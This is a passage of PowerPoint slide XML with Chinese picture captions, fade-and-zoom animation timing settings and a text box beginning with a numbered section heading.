        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="2545080"/>
            <a:ext cx="527685" cy="527685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25" descr="上课"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId36">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId37"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054475" y="1998980"/>
            <a:ext cx="476885" cy="476885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26" descr="皇冠"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId38">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId39"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="3238500"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27" descr="纸笔"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId40">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId41"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1040130"/>
            <a:ext cx="568325" cy="568325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 28" descr="购物篮"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId42">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId43"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317240" y="1901190"/>
            <a:ext cx="574675" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2049"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2549"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3799"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5050"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5550"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105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21" grpId="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="11" grpId="1"/>
    </p:bld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等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-354902" y="1593655"/>
            <a:ext cx="2812747" cy="2101740"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859264" y="2678072"/>
            <a:ext cx="5245100" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
